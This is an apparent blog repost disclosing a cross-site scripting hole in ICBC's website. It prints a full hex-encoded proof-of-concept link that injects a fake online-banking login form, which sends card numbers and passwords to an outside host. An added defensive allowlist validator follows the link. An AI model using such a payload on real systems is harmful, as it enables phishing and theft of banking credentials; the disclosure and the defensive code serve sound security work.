ICBC's Low-Level Vulnerability (zz from cnBeta)
且行且远
Category: Programming Garden. Posted by ssfighter on January 4, 2007

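ICBC has blocked the hotspot vulnerability, but is the vulnerability gone?
No, it still exists. The ICBC page itself no longer appears, but because the link goes through ICBC's official page, one only needs to construct a page that impersonates an ICBC page, and that page can still be used for phishing. Screenshot below: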



Simulated phishing address: simulated phishing address

The link code is as follows:

http://www.icbc.com.cn/click/adver/adver.jsp?para=%6A%61%76%61%73%63%72%69%70%74%3A%73%28%29%3B%66%75%6E%63%74%69%6F%6E%20%73%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%74%69%74%6C%65%3E%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0%D0%C2%D2%BB%B4%FA%CD%F8%C9%CF%D2%F8%D0%D0%3C%2F%74%69%74%6C%65%3E%3C%64%69%76%20%61%6C%69%67%6E%253Dcenter%3E%3Cform%20name%253Df%20action%253Dhttp%3A%2F%2Fwww%2E126%2Ecom%3E%3Ctable%20border%253D0%20width%253D400%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Cb%3E%3Cfont%20color%253D%2523FF0000%3E%B8%F6%C8%CB%CD%F8%C9%CF%D2%F8%D0%D0%D3%C3%BB%A7%B5%C7%C2%BC%3C%2Ffont%3E%3C%2Fb%3E%3Cp%20align%253Dcenter%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D7%A2%B2%E1%BF%A8%BA%2F%B5%C7%C2%BCID%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dtext%20name%253Da%20size%253D19%20maxlength%253D19%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%B5%C7%C2%BC%C3%DC%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Db%20size%253D20%20maxlength%253D20%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D3%D2%B2%E0%CF%D4%CA%BE%B5%C4%D1%E9%D6%A4%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Dc%20size%253D4%20maxlength%253D4%3E%2526nbsp%3B%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fverifyimage%2Ejsp%3FrandomKey%253D1167791351382113206%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fagree%2Egif%20border%253D0%3E%3C%2Fa%3E%2526nbsp%3B%2526nbsp%3B%2526nbsp%3B%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fdisagree%2Egif%20border%253D0%3E%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3C%2Fform%3E%3
C%2Fdiv%3E%27%29%29%7D%2F%2F

Heh, such a low-level vulnerability, and on ICBC's website of all places... It makes phishing possible.
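A server-side allowlist check for the `para` value would reject the link above; the following is an added example, not part of the original post and not ICBC's code. It assumes `para` is meant to carry a click-through target URL (the post does not say how `adver.jsp` uses it), and `ALLOWED_HOSTS`, `fullyDecode` and `validateTarget` are hypothetical names.

```javascript
// Added example. ALLOWED_HOSTS and all function names are hypothetical.
const ALLOWED_HOSTS = new Set(["www.icbc.com.cn", "mybank.icbc.com.cn"]);

// Percent-decode until the value stops changing, so double-encoded input
// (for example %253D -> %3D -> "=") is inspected in its final form.
function fullyDecode(value, maxRounds = 5) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      return null; // malformed or non-UTF-8 escape sequence: reject
    }
    if (next === current) return current;
    current = next;
  }
  return null; // still changing after maxRounds: reject
}

// Accept only absolute http(s) URLs whose host is on the allowlist.
function validateTarget(rawPara) {
  const decoded = fullyDecode(rawPara);
  if (decoded === null) return { ok: false, reason: "undecodable" };
  let url;
  try {
    url = new URL(decoded); // relative or scheme-less input throws
  } catch (e) {
    return { ok: false, reason: "not-absolute-url" };
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") {
    return { ok: false, reason: "scheme" }; // javascript:, data:, ...
  }
  if (!ALLOWED_HOSTS.has(url.hostname)) return { ok: false, reason: "host" };
  return { ok: true, target: url.href };
}

// Constructed sample values for the para parameter.
const samples = [
  "https%3A%2F%2Fmybank.icbc.com.cn%2Ficbc%2Fperbank%2F",
  "%6A%61%76%61%73%63%72%69%70%74%3Avoid(0)",
  "javascript%253Avoid(0)",
  "https%3A%2F%2Flogin.example.net%2F",
];
for (const s of samples) console.log(s, "->", JSON.stringify(validateTarget(s)));
```

If the validated value is also written into a page, it still needs HTML encoding for the context it lands in.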


